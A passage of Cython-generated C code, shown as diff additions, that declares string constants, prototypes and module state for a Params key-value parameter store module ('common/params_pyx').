__pyx_k_module_2[] = "module"; +static const char __pyx_k_put_bool[] = "put_bool"; +static const char __pyx_k_pyx_type[] = "__pyx_type"; +static const char __pyx_k_qualname[] = "__qualname__"; +static const char __pyx_k_set_name[] = "__set_name__"; +static const char __pyx_k_setstate[] = "__setstate__"; +static const char __pyx_k_TypeError[] = "TypeError"; +static const char __pyx_k_check_key[] = "check_key"; +static const char __pyx_k_clear_all[] = "clear_all"; +static const char __pyx_k_dat_bytes[] = "dat_bytes"; +static const char __pyx_k_isenabled[] = "isenabled"; +static const char __pyx_k_key_bytes[] = "key_bytes"; +static const char __pyx_k_metaclass[] = "__metaclass__"; +static const char __pyx_k_pyx_state[] = "__pyx_state"; +static const char __pyx_k_reduce_ex[] = "__reduce_ex__"; +static const char __pyx_k_threading[] = "threading"; +static const char __pyx_k_PERSISTENT[] = "PERSISTENT"; +static const char __pyx_k_Params_get[] = "Params.get"; +static const char __pyx_k_Params_put[] = "Params.put"; +static const char __pyx_k_ValueError[] = "ValueError"; +static const char __pyx_k_pyx_result[] = "__pyx_result"; +static const char __pyx_k_MemoryError[] = "MemoryError"; +static const char __pyx_k_OrderedDict[] = "OrderedDict"; +static const char __pyx_k_PickleError[] = "PickleError"; +static const char __pyx_k_collections[] = "collections"; +static const char __pyx_k_mro_entries[] = "__mro_entries__"; +static const char __pyx_k_ParamKeyType[] = "ParamKeyType"; +static const char __pyx_k_Pyx_EnumBase[] = "__Pyx_EnumBase"; +static const char __pyx_k_Pyx_FlagBase[] = "__Pyx_FlagBase"; +static const char __pyx_k_ensure_bytes[] = "ensure_bytes"; +static const char __pyx_k_initializing[] = "_initializing"; +static const char __pyx_k_is_coroutine[] = "_is_coroutine"; +static const char __pyx_k_member_names[] = "_member_names_"; +static const char __pyx_k_pyx_checksum[] = "__pyx_checksum"; +static const char __pyx_k_stringsource[] = ""; +static const char __pyx_k_use_setstate[] = "use_setstate"; +static const char __pyx_k_Params_remove[] = "Params.remove"; +static const char __pyx_k_class_getitem[] = "__class_getitem__"; +static const char __pyx_k_init_subclass[] = "__init_subclass__"; +static const char __pyx_k_reduce_cython[] = "__reduce_cython__"; +static const char __pyx_k_UnknownKeyName[] = "UnknownKeyName"; +static const char __pyx_k_get_param_path[] = "get_param_path"; +static const char __pyx_k_Params_all_keys[] = "Params.all_keys"; +static const char __pyx_k_Params_get_bool[] = "Params.get_bool"; +static const char __pyx_k_Params_put_bool[] = "Params.put_bool"; +static const char __pyx_k_put_nonblocking[] = "put_nonblocking"; +static const char __pyx_k_pyx_PickleError[] = "__pyx_PickleError"; +static const char __pyx_k_setstate_cython[] = "__setstate_cython__"; +static const char __pyx_k_Params_check_key[] = "Params.check_key"; +static const char __pyx_k_Params_clear_all[] = "Params.clear_all"; +static const char __pyx_k_KeyboardInterrupt[] = "KeyboardInterrupt"; +static const char __pyx_k_common_params_pyx[] = "common.params_pyx"; +static const char __pyx_k_Pyx_EnumBase___new[] = "__Pyx_EnumBase.__new__"; +static const char __pyx_k_Pyx_EnumBase___str[] = "__Pyx_EnumBase.__str__"; +static const char __pyx_k_Pyx_FlagBase___new[] = "__Pyx_FlagBase.__new__"; +static const char __pyx_k_Pyx_FlagBase___str[] = "__Pyx_FlagBase.__str__"; +static const char __pyx_k_asyncio_coroutines[] = "asyncio.coroutines"; +static const char __pyx_k_cline_in_traceback[] = "cline_in_traceback"; +static const char __pyx_k_Pyx_EnumBase___repr[] = "__Pyx_EnumBase.__repr__"; +static const char __pyx_k_Pyx_FlagBase___repr[] = "__Pyx_FlagBase.__repr__"; +static const char __pyx_k_Unknown_enum_value_s[] = "Unknown enum value: '%s'"; +static const char __pyx_k_put_bool_nonblocking[] = "put_bool_nonblocking"; +static const char __pyx_k_Params_get_param_path[] = "Params.get_param_path"; +static const char __pyx_k_common_params_pyx_pyx[] = "common/params_pyx.pyx"; +static const char __pyx_k_CLEAR_ON_MANAGER_START[] = "CLEAR_ON_MANAGER_START"; +static const char __pyx_k_Params___reduce_cython[] = "Params.__reduce_cython__"; +static const char __pyx_k_Params___setstate_cython[] = "Params.__setstate_cython__"; +static const char __pyx_k_CLEAR_ON_ONROAD_TRANSITION[] = "CLEAR_ON_ONROAD_TRANSITION"; +static const char __pyx_k_CLEAR_ON_OFFROAD_TRANSITION[] = "CLEAR_ON_OFFROAD_TRANSITION"; +static const char __pyx_k_pyx_unpickle___Pyx_EnumMeta[] = "__pyx_unpickle___Pyx_EnumMeta"; +static const char __pyx_k_Pyx_EnumMeta___reduce_cython[] = "__Pyx_EnumMeta.__reduce_cython__"; +static const char __pyx_k_put_nonblocking_locals_lambda[] = "put_nonblocking.."; +static const char __pyx_k_Pyx_EnumMeta___setstate_cython[] = "__Pyx_EnumMeta.__setstate_cython__"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0xe3b0c44, 0xda39a3e, 0xd41d8cd) = ())"; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +static const char __pyx_k_put_bool_nonblocking_locals_lamb[] = "put_bool_nonblocking.."; +/* #### Code section: decls ### */ +static int __pyx_pf_8EnumBase_14__Pyx_EnumMeta___init__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name, PyObject *__pyx_v_parents, PyObject *__pyx_v_dct); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_2__iter__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_4__getitem__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_cls, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_6__reduce_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumMeta_8__setstate_cython__(struct __pyx_obj___Pyx_EnumMeta *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_EnumBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase___new__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_cls, PyObject *__pyx_v_value, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_2__repr__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase_14__Pyx_FlagBase_4__str__(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_8EnumBase___pyx_unpickle___Pyx_EnumMeta(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_ensure_bytes(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_v); /* proto */ +static int __pyx_pf_6common_10params_pyx_6Params___cinit__(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_d); /* proto */ +static void __pyx_pf_6common_10params_pyx_6Params_2__dealloc__(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_4clear_all(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_tx_type); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_6check_key(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_8get(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_block, PyObject *__pyx_v_encoding); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_10get_bool(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_block); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_12put(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, PyObject *__pyx_v_dat); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_14put_bool(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key, bool __pyx_v_val); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_16remove(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_18get_param_path(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, PyObject *__pyx_v_key); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_20all_keys(struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_22__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_6Params_24__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_lambda_funcdef_lambda(PyObject *__pyx_self); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_2put_nonblocking(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_key, PyObject *__pyx_v_val, PyObject *__pyx_v_d); /* proto */ +static PyObject *__pyx_lambda_funcdef_lambda1(PyObject *__pyx_self); /* proto */ +static PyObject *__pyx_pf_6common_10params_pyx_4put_bool_nonblocking(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_key, bool __pyx_v_val, PyObject *__pyx_v_d); /* proto */ +static PyObject *__pyx_tp_new_6common_10params_pyx_Params(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6common_10params_pyx___pyx_scope_struct__put_nonblocking(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static __Pyx_CachedCFunction __pyx_umethod_PyDict_Type_get = {0, 0, 0, 0, 0}; +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_6common_10params_pyx_Params; + PyObject *__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking; + PyObject *__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking; + PyObject *__Pyx_EnumMeta; + #endif + PyTypeObject *__pyx_ptype_6common_10params_pyx_Params; + PyTypeObject *__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking; + PyTypeObject *__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking; + PyTypeObject *__pyx_ptype___Pyx_EnumMeta; + PyObject *__pyx_kp_s_; + PyObject *__pyx_kp_u_; + PyObject *__pyx_n_s_ALL; + PyObject *__pyx_n_s_CLEAR_ON_MANAGER_START; + PyObject *__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION; + PyObject *__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION; + PyObject *__pyx_n_s_EnumBase; + PyObject *__pyx_n_s_EnumType; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_n_s_IntEnum; + PyObject *__pyx_n_s_IntFlag; + PyObject *__pyx_n_s_KeyboardInterrupt; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_n_s_OrderedDict; + PyObject *__pyx_n_s_PERSISTENT; + PyObject *__pyx_n_s_ParamKeyType; + PyObject *__pyx_n_s_Params; + PyObject *__pyx_n_s_Params___reduce_cython; + PyObject *__pyx_n_s_Params___setstate_cython; + PyObject *__pyx_n_s_Params_all_keys; + PyObject *__pyx_n_s_Params_check_key; + PyObject *__pyx_n_s_Params_clear_all; + PyObject *__pyx_n_s_Params_get; + PyObject *__pyx_n_s_Params_get_bool; + PyObject *__pyx_n_s_Params_get_param_path; + PyObject *__pyx_n_s_Params_put; + PyObject *__pyx_n_s_Params_put_bool; + PyObject *__pyx_n_s_Params_remove; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_s_Pyx_EnumBase; + PyObject *__pyx_n_s_Pyx_EnumBase___new; + PyObject *__pyx_n_s_Pyx_EnumBase___repr; + PyObject *__pyx_n_s_Pyx_EnumBase___str; + PyObject *__pyx_n_s_Pyx_EnumMeta___reduce_cython; + PyObject *__pyx_n_s_Pyx_EnumMeta___setstate_cython; + PyObject *__pyx_n_s_Pyx_FlagBase; + PyObject *__pyx_n_s_Pyx_FlagBase___new; + PyObject *__pyx_n_s_Pyx_FlagBase___repr; + PyObject *__pyx_n_s_Pyx_FlagBase___str; + PyObject *__pyx_n_s_Thread; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_n_s_UnknownKeyName; + PyObject *__pyx_kp_s_Unknown_enum_value_s; + PyObject *__pyx_n_s_ValueError; + PyObject *__pyx_n_s__21; + PyObject *__pyx_kp_u__3; + PyObject *__pyx_n_s__51; + PyObject *__pyx_n_s_all_keys; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_n_s_block; + PyObject *__pyx_n_s_check_key; + PyObject *__pyx_n_s_class; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_clear_all; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_cls; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_n_s_common_params_pyx; + PyObject *__pyx_kp_s_common_params_pyx_pyx; + PyObject *__pyx_n_s_d; + PyObject *__pyx_n_s_dat; + PyObject *__pyx_n_s_dat_bytes; + PyObject *__pyx_n_s_dct; + PyObject *__pyx_n_s_decode; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dict_2; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_doc; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_n_s_encoding; + PyObject *__pyx_n_s_ensure_bytes; + PyObject *__pyx_n_s_enum; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_get; + PyObject *__pyx_n_s_get_bool; + PyObject *__pyx_n_s_get_param_path; + PyObject *__pyx_n_s_getstate; + PyObject *__pyx_n_s_import; + PyObject *__pyx_n_s_init; + PyObject *__pyx_n_s_init_subclass; + PyObject *__pyx_n_s_initializing; + PyObject *__pyx_n_s_is_coroutine; + PyObject *__pyx_kp_u_isenabled; + PyObject *__pyx_n_s_k; + PyObject *__pyx_n_s_key; + PyObject *__pyx_n_s_key_bytes; + PyObject *__pyx_n_s_main; + PyObject *__pyx_n_s_member_names; + PyObject *__pyx_n_s_members; + PyObject *__pyx_n_s_metaclass; + PyObject *__pyx_n_s_module; + PyObject *__pyx_n_s_module_2; + PyObject *__pyx_n_s_mro_entries; + PyObject *__pyx_n_s_name; + PyObject *__pyx_n_s_name_2; + PyObject *__pyx_n_s_new; + PyObject *__pyx_kp_s_no_default___reduce___due_to_non; + PyObject *__pyx_n_s_parents; + PyObject *__pyx_n_s_pickle; + PyObject *__pyx_n_s_prepare; + PyObject *__pyx_n_s_put; + PyObject *__pyx_n_s_put_bool; + PyObject *__pyx_n_s_put_bool_nonblocking; + PyObject *__pyx_n_s_put_bool_nonblocking_locals_lamb; + PyObject *__pyx_n_s_put_nonblocking; + PyObject *__pyx_n_s_put_nonblocking_locals_lambda; + PyObject *__pyx_n_s_pyx_PickleError; + PyObject *__pyx_n_s_pyx_checksum; + PyObject *__pyx_n_s_pyx_result; + PyObject *__pyx_n_s_pyx_state; + PyObject *__pyx_n_s_pyx_type; + PyObject *__pyx_n_s_pyx_unpickle___Pyx_EnumMeta; + PyObject *__pyx_n_s_qualname; + PyObject *__pyx_n_s_r; + PyObject *__pyx_n_s_range; + PyObject *__pyx_n_s_reduce; + PyObject *__pyx_n_s_reduce_cython; + PyObject *__pyx_n_s_reduce_ex; + PyObject *__pyx_n_s_remove; + PyObject *__pyx_n_s_repr; + PyObject *__pyx_n_s_res; + PyObject *__pyx_kp_s_s_s; + PyObject *__pyx_kp_s_s_s_d; + PyObject *__pyx_n_s_self; + PyObject *__pyx_n_s_set_name; + PyObject *__pyx_n_s_setstate; + PyObject *__pyx_n_s_setstate_cython; + PyObject *__pyx_n_s_spec; + PyObject *__pyx_n_s_start; + PyObject *__pyx_n_s_state; + PyObject *__pyx_n_s_str; + PyObject *__pyx_kp_s_stringsource; + PyObject *__pyx_n_s_super; + PyObject *__pyx_n_s_target; + PyObject *__pyx_n_s_test; + PyObject *__pyx_n_s_threading; + PyObject *__pyx_n_s_tx_type; + PyObject *__pyx_n_s_update; + PyObject *__pyx_n_s_use_setstate; + PyObject *__pyx_n_s_v; + PyObject *__pyx_n_s_val; + PyObject *__pyx_n_s_value; + PyObject *__pyx_n_s_values; + PyObject *__pyx_int_222419149; + PyObject *__pyx_int_228825662; + PyObject *__pyx_int_238750788; + PyObject *__pyx_k__4; + PyObject *__pyx_tuple__2; + PyObject *__pyx_tuple__5; + PyObject *__pyx_tuple__7; + PyObject *__pyx_tuple__9; + PyObject *__pyx_tuple__11; + PyObject *__pyx_tuple__12; + PyObject *__pyx_tuple__16; + PyObject *__pyx_tuple__19; + PyObject *__pyx_tuple__22; + PyObject *__pyx_tuple__24; + PyObject *__pyx_tuple__26; + PyObject *__pyx_tuple__28; + PyObject *__pyx_tuple__30; + PyObject *__pyx_tuple__31; + PyObject *__pyx_tuple__33; + PyObject *__pyx_tuple__34; + PyObject *__pyx_tuple__36; + PyObject *__pyx_tuple__38; + PyObject *__pyx_tuple__40; + PyObject *__pyx_tuple__42; + PyObject *__pyx_tuple__46; + PyObject *__pyx_tuple__48; + PyObject *__pyx_tuple__50; + PyObject *__pyx_codeobj__6; + PyObject *__pyx_codeobj__8; + PyObject *__pyx_codeobj__10; + PyObject *__pyx_codeobj__13; + PyObject *__pyx_codeobj__14; + PyObject *__pyx_codeobj__15; + PyObject *__pyx_codeobj__17; + PyObject *__pyx_codeobj__18; + PyObject *__pyx_codeobj__20; + PyObject *__pyx_codeobj__23; + PyObject *__pyx_codeobj__25; + PyObject *__pyx_codeobj__27; + PyObject *__pyx_codeobj__29; + PyObject *__pyx_codeobj__32; + PyObject *__pyx_codeobj__35; + PyObject *__pyx_codeobj__37; + PyObject *__pyx_codeobj__39; + PyObject *__pyx_codeobj__41; + PyObject *__pyx_codeobj__43; + PyObject *__pyx_codeobj__44; + PyObject *__pyx_codeobj__45; + PyObject *__pyx_codeobj__47; + PyObject *__pyx_codeobj__49; +} __pyx_mstate; + +#if CYTHON_USE_MODULE_STATE +#ifdef __cplusplus +namespace { + extern struct PyModuleDef __pyx_moduledef; +} /* anonymous namespace */ +#else +static struct PyModuleDef __pyx_moduledef; +#endif + +#define __pyx_mstate(o) ((__pyx_mstate *)__Pyx_PyModule_GetState(o)) + +#define __pyx_mstate_global (__pyx_mstate(PyState_FindModule(&__pyx_moduledef))) + +#define __pyx_m (PyState_FindModule(&__pyx_moduledef)) +#else +static __pyx_mstate __pyx_mstate_global_static = +#ifdef __cplusplus + {}; +#else + {0}; +#endif +static __pyx_mstate *__pyx_mstate_global = &__pyx_mstate_global_static; +#endif +/* #### Code section: module_state_clear ### */ +#if CYTHON_USE_MODULE_STATE +static int __pyx_m_clear(PyObject *m) { + __pyx_mstate *clear_module_state = __pyx_mstate(m); + if (!clear_module_state) return 0; + Py_CLEAR(clear_module_state->__pyx_d); + Py_CLEAR(clear_module_state->__pyx_b); + Py_CLEAR(clear_module_state->__pyx_cython_runtime); + Py_CLEAR(clear_module_state->__pyx_empty_tuple); + Py_CLEAR(clear_module_state->__pyx_empty_bytes); + Py_CLEAR(clear_module_state->__pyx_empty_unicode); + #ifdef __Pyx_CyFunction_USED + Py_CLEAR(clear_module_state->__pyx_CyFunctionType); + #endif + #ifdef __Pyx_FusedFunction_USED + Py_CLEAR(clear_module_state->__pyx_FusedFunctionType); + #endif + Py_CLEAR(clear_module_state->__pyx_ptype_6common_10params_pyx_Params); + Py_CLEAR(clear_module_state->__pyx_type_6common_10params_pyx_Params); + Py_CLEAR(clear_module_state->__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking); + Py_CLEAR(clear_module_state->__pyx_type_6common_10params_pyx___pyx_scope_struct__put_nonblocking); + Py_CLEAR(clear_module_state->__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking); + Py_CLEAR(clear_module_state->__pyx_type_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking); + Py_CLEAR(clear_module_state->__pyx_ptype___Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__Pyx_EnumMeta); + Py_CLEAR(clear_module_state->__pyx_kp_s_); + Py_CLEAR(clear_module_state->__pyx_kp_u_); + Py_CLEAR(clear_module_state->__pyx_n_s_ALL); + Py_CLEAR(clear_module_state->__pyx_n_s_CLEAR_ON_MANAGER_START); + Py_CLEAR(clear_module_state->__pyx_n_s_CLEAR_ON_OFFROAD_TRANSITION); + Py_CLEAR(clear_module_state->__pyx_n_s_CLEAR_ON_ONROAD_TRANSITION); + Py_CLEAR(clear_module_state->__pyx_n_s_EnumBase); + Py_CLEAR(clear_module_state->__pyx_n_s_EnumType); + Py_CLEAR(clear_module_state->__pyx_kp_s_Incompatible_checksums_0x_x_vs_0); + Py_CLEAR(clear_module_state->__pyx_n_s_IntEnum); + Py_CLEAR(clear_module_state->__pyx_n_s_IntFlag); + Py_CLEAR(clear_module_state->__pyx_n_s_KeyboardInterrupt); + Py_CLEAR(clear_module_state->__pyx_n_s_MemoryError); + Py_CLEAR(clear_module_state->__pyx_n_s_OrderedDict); + Py_CLEAR(clear_module_state->__pyx_n_s_PERSISTENT); + Py_CLEAR(clear_module_state->__pyx_n_s_ParamKeyType); + Py_CLEAR(clear_module_state->__pyx_n_s_Params); + Py_CLEAR(clear_module_state->__pyx_n_s_Params___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Params___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_all_keys); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_check_key); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_clear_all); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_get); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_get_bool); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_get_param_path); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_put); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_put_bool); + Py_CLEAR(clear_module_state->__pyx_n_s_Params_remove); + Py_CLEAR(clear_module_state->__pyx_n_s_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___new); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___repr); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumBase___str); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumMeta___reduce_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_EnumMeta___setstate_cython); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___new); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___repr); + Py_CLEAR(clear_module_state->__pyx_n_s_Pyx_FlagBase___str); + Py_CLEAR(clear_module_state->__pyx_n_s_Thread); + Py_CLEAR(clear_module_state->__pyx_n_s_TypeError); + Py_CLEAR(clear_module_state->__pyx_n_s_UnknownKeyName); + Py_CLEAR(clear_module_state->__pyx_kp_s_Unknown_enum_value_s); + Py_CLEAR(clear_module_state->__pyx_n_s_ValueError); + Py_CLEAR(clear_module_state->__pyx_n_s__21); + Py_CLEAR(clear_module_state->__pyx_kp_u__3); + Py_CLEAR(clear_module_state->__pyx_n_s__51); + Py_CLEAR(clear_module_state->__pyx_n_s_all_keys); + Py_CLEAR(clear_module_state->__pyx_n_s_asyncio_coroutines); + Py_CLEAR(clear_module_state->__pyx_n_s_block); + Py_CLEAR(clear_module_state->__pyx_n_s_check_key); + Py_CLEAR(clear_module_state->__pyx_n_s_class); + Py_CLEAR(clear_module_state->__pyx_n_s_class_getitem); + Py_CLEAR(clear_module_state->__pyx_n_s_clear_all); + Py_CLEAR(clear_module_state->__pyx_n_s_cline_in_traceback); + Py_CLEAR(clear_module_state->__pyx_n_s_cls); + Py_CLEAR(clear_module_state->__pyx_n_s_collections); + Py_CLEAR(clear_module_state->__pyx_n_s_common_params_pyx); + Py_CLEAR(clear_module_state->__pyx_kp_s_common_params_pyx_pyx); + Py_CLEAR(clear_module_state->__pyx_n_s_d); + Py_CLEAR(clear_module_state->__pyx_n_s_dat); + Py_CLEAR(clear_module_state->__pyx_n_s_dat_bytes); + Py_CLEAR(clear_module_state->__pyx_n_s_dct); + Py_CLEAR(clear_module_state->__pyx_n_s_decode); + Py_CLEAR(clear_module_state->__pyx_n_s_dict); + Py_CLEAR(clear_module_state->__pyx_n_s_dict_2); + Py_CLEAR(clear_module_state->__pyx_kp_u_disable); + Py_CLEAR(clear_module_state->__pyx_n_s_doc); + Py_CLEAR(clear_module_state->__pyx_kp_u_enable); + Py_CLEAR(clear_module_state->__pyx_n_s_encode); + Py_CLEAR(clear_module_state->__pyx_n_s_encoding); + Py_CLEAR(clear_module_state->__pyx_n_s_ensure_bytes); + Py_CLEAR(clear_module_state->__pyx_n_s_enum); + Py_CLEAR(clear_module_state->__pyx_kp_u_gc); + Py_CLEAR(clear_module_state->__pyx_n_s_get); + Py_CLEAR(clear_module_state->__pyx_n_s_get_bool); + Py_CLEAR(clear_module_state->__pyx_n_s_get_param_path); + Py_CLEAR(clear_module_state->__pyx_n_s_getstate); + Py_CLEAR(clear_module_state->__pyx_n_s_import); + Py_CLEAR(clear_module_state->__pyx_n_s_init); + Py_CLEAR(clear_module_state->__pyx_n_s_init_subclass); + Py_CLEAR(clear_module_state->__pyx_n_s_initializing); + Py_CLEAR(clear_module_state->__pyx_n_s_is_coroutine); + Py_CLEAR(clear_module_state->__pyx_kp_u_isenabled); + Py_CLEAR(clear_module_state->__pyx_n_s_k); + Py_CLEAR(clear_module_state->__pyx_n_s_key); + Py_CLEAR(clear_module_state->__pyx_n_s_key_bytes); + Py_CLEAR(clear_module_state->__pyx_n_s_main); + Py_CLEAR(clear_module_state->__pyx_n_s_member_names); + Py_CLEAR(clear_module_state->__pyx_n_s_members); + Py_CLEAR(clear_module_state->__pyx_n_s_metaclass); + Py_CLEAR(clear_module_state->__pyx_n_s_module); + Py_CLEAR(clear_module_state->__pyx_n_s_module_2); + Py_CLEAR(clear_module_state->__pyx_n_s_mro_entries); + Py_CLEAR(clear_module_state->__pyx_n_s_name); + Py_CLEAR(clear_module_state->__pyx_n_s_name_2); + Py_CLEAR(clear_module_state->__pyx_n_s_new); + Py_CLEAR(clear_module_state->__pyx_kp_s_no_default___reduce___due_to_non); + Py_CLEAR(clear_module_state->__pyx_n_s_parents); + Py_CLEAR(clear_module_state->__pyx_n_s_pickle); + Py_CLEAR(clear_module_state->__pyx_n_s_prepare); + Py_CLEAR(clear_module_state->__pyx_n_s_put); + Py_CLEAR(clear_module_state->__pyx_n_s_put_bool); + Py_CLEAR(clear_module_state->__pyx_n_s_put_bool_nonblocking); + Py_CLEAR(clear_module_state->__pyx_n_s_put_bool_nonblocking_locals_lamb); + Py_CLEAR(clear_module_state->__pyx_n_s_put_nonblocking); + Py_CLEAR(clear_module_state->__pyx_n_s_put_nonblocking_locals_lambda); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_PickleError); + Py_CLEAR(clear_module_state->__pyx_n_s_pyx_checksum); + 